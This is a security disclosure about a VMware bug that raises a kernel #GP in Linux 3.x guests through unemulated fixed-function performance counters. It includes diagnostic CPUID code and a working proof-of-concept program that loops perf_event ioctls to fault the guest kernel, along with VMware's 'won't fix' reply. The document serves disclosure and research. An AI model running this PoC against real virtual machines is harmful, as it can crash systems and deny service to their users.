VMware + Linux 3.x PoC - Vitaly Nikolenko

This issue was reported to VMware on 29th April 2016 and was marked as "won't fix". It affects Linux 3.x kernels (including stable) running as guests on VMware hypervisors. Other Operating Systems may be affected. Other software hypervisors are not affected.

Description

The issue is related to the emulation of performance counters on VMware products running on processors based on the Intel Core microarchitecture. Only Linux guests were investigated; other operating systems may be affected as well.

When the "Enable code profiling applications in this virtual machine" option is disabled (which is the default configuration), the rdpmc instruction raises #GP for the fixed-function performance counter indices (1<<30), (1<<30)+1 and (1<<30)+2, both in user space (even when CR4.PCE = 1) and in kernel space. According to the Intel specification: "Processors based on Intel Core microarchitecture provide three fixed-function performance counters. Bits beyond the width of the fixed counter are reserved and must be written as zeros. Model-specific fixed-function performance counters on processors that support Architectural Perfmon version 1 are 40 bits wide..." (Intel 64 and IA-32 Architectures, Software Developer's Manual, Volume 3 - Section 18.4.1). However, VMware products advertise the same family and model IDs as the host CPU but remove the fixed-function counters:

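#include <stdio.h>
#include <stdint.h>

/* Execute CPUID for the given leaf (subleaf 0) and return EAX and EDX. */
static inline void cpuid(uint32_t leaf, uint32_t *a, uint32_t *d) {
	uint32_t b, c;

	asm volatile("cpuid"
			: "=a"(*a), "=b"(b), "=c"(c), "=d"(*d)
			: "a"(leaf), "c"(0));
	(void)b;
	(void)c;
}

int main(void) {
	uint32_t a, d;

	/* Leaf 0x0a: architectural performance monitoring */
	cpuid(0x0a, &a, &d);
	printf("perfmon version: %u\n", a & 0xff);		/* EAX[7:0] */
	printf("fixed function counters: %u\n", d & 0x1f);	/* EDX[4:0] */

	/* Leaf 1: the family ID is EAX[11:8]; EAX[7:4] is the model */
	cpuid(1, &a, &d);
	printf("family id: %u\n", (a >> 8) & 0xf);
	return 0;
}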


vnik@vm:~$ ./cpuid 
perfmon version: 1
fixed function counters: 0
family id: 6

Based on the CPU family and perfmon version that VMware advertises, Linux 3.x kernels set up the PMU with support for fixed-function counters, even though the hypervisor does not emulate them.
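As a rough illustration of what the guest sees, the sketch below decodes a few more fields of CPUID leaf 0x0a than the test program above prints. The struct and function names are hypothetical and are not taken from the kernel; the bit positions follow the layout of the architectural performance monitoring leaf. It only decodes register values passed in, so it can be fed the EAX and EDX values returned by the cpuid() helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical container for the CPUID leaf 0x0a fields of interest. */
struct perfmon_info {
	unsigned version;		/* EAX[7:0]   perfmon version */
	unsigned gp_counters;		/* EAX[15:8]  general-purpose counters */
	unsigned gp_width;		/* EAX[23:16] general-purpose counter width */
	unsigned fixed_counters;	/* EDX[4:0]   fixed-function counters */
	unsigned fixed_width;		/* EDX[12:5]  fixed-function counter width */
};

/* Split the raw EAX/EDX values of CPUID leaf 0x0a into their fields. */
static inline void decode_perfmon(uint32_t eax, uint32_t edx,
		struct perfmon_info *out) {
	assert(out != NULL);
	out->version = eax & 0xff;
	out->gp_counters = (eax >> 8) & 0xff;
	out->gp_width = (eax >> 16) & 0xff;
	out->fixed_counters = edx & 0x1f;
	out->fixed_width = (edx >> 5) & 0xff;
}

/*
 * Nonzero when a PMU is advertised (version >= 1) but no fixed-function
 * counters are enumerated, which is the combination shown in the output above.
 */
static inline int lacks_fixed_counters(const struct perfmon_info *pi) {
	return pi->version >= 1 && pi->fixed_counters == 0;
}
```

A guest-side tool could call decode_perfmon() on the leaf 0x0a values and treat lacks_fixed_counters() as a hint that rdpmc with a fixed-function index may fault; this is only a heuristic, not a statement about how the kernel decides.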

According to the specification, the rdpmc instruction raises #GP in protected mode in either of the following cases:

If the current privilege level is not 0 and the PCE flag in the CR4 register is clear.
If an invalid performance counter index is specified (see Table 4-13).

When #GP is triggered in user space, it is handled safely, as if PCE were clear (even if it is not). However, there is at least one path in Linux 3.x kernels that reaches rdpmc in kernel space and triggers a #GP when the ECX value is in the range (1<<30) to (1<<30)+2. This fault is triggered in one of the ISRs at CPL=0; on our test system, for example, it is triggered in x86_perf_event_update().
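The counter indices in this write-up are given in shorthand. A minimal sketch of how the ECX value for rdpmc is composed is shown below; the macro and helper names are hypothetical and do not come from the kernel or from the PoC. Bit 30 of ECX selects the fixed-function counter bank and the low bits select the counter within it. Note that in C the + operator binds tighter than <<, so an expression written literally as 1<<30+1 would shift by 31; the shift has to be parenthesized or combined with a bitwise OR.

```c
#include <assert.h>
#include <stdint.h>

/* Bit 30 of ECX selects the fixed-function counter bank for rdpmc. */
#define RDPMC_FIXED_BANK (UINT32_C(1) << 30)

/* Hypothetical helper: ECX value for fixed-function counter n (0, 1 or 2). */
static inline uint32_t rdpmc_fixed_index(uint32_t n) {
	assert(n < 3);	/* Intel Core microarchitecture provides three */
	return RDPMC_FIXED_BANK | n;
}

/* Hypothetical helper: nonzero if an ECX value addresses the fixed bank. */
static inline int rdpmc_is_fixed(uint32_t ecx) {
	return (ecx & RDPMC_FIXED_BANK) != 0;
}
```

With these helpers, rdpmc_fixed_index(0) through rdpmc_fixed_index(2) give the three ECX values for which the guest receives #GP.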

4.x kernels do not appear to be affected by this issue. Major changes were made to the perfmon counter implementation and the vulnerable code was refactored.

The following is a proof of concept for 3.x kernels:

/**
 * VMware Linux guest - kernels 3.x PoC
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 
 * gcc vmware.c -o vmware
 */
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/perf_event.h>
#include <asm/unistd.h>

/* glibc provides no wrapper for perf_event_open(2), so call it directly. */
static long
perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
		int cpu, int group_fd, unsigned long flags) {
	return syscall(__NR_perf_event_open, hw_event, pid, cpu,
			group_fd, flags);
}

int
main(void) {
	struct perf_event_attr pe;
	int fd;

	memset(&pe, 0, sizeof(pe));
	pe.type = PERF_TYPE_HARDWARE;	/* 0 */
	pe.size = sizeof(pe);
	pe.config = 9;			/* PERF_COUNT_HW_REF_CPU_CYCLES */
	pe.disabled = 1;
	pe.exclude_kernel = 1;
	pe.exclude_hv = 1;

	/* Monitor the calling process on any CPU, with no event group. */
	fd = perf_event_open(&pe, 0, -1, -1, 0);
	if (fd == -1)
		err(EXIT_FAILURE, "perf_event_open");

	ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);

	/* Re-enable the event in a loop (argument 1 is PERF_IOC_FLAG_GROUP). */
	while (1) {
		putchar('b');
		ioctl(fd, PERF_EVENT_IOC_ENABLE, 1);
	}
}

Response from VMware

VMware investigated this issue and replied that they do not support fixed-function performance counters and thus generate a #GP at CPL=0. They believe this bug is not in their code but in the Linux kernel. They also believe that privilege escalation is not possible: "this #GP is handed over to the Linux kernel which should properly handle the CPL. So we do not believe that a escalation of privileges would be possible."

This was also reported to the Linux kernel developers but they're not eager to fix bugs related to closed-source hypervisors that don't adhere to the specification.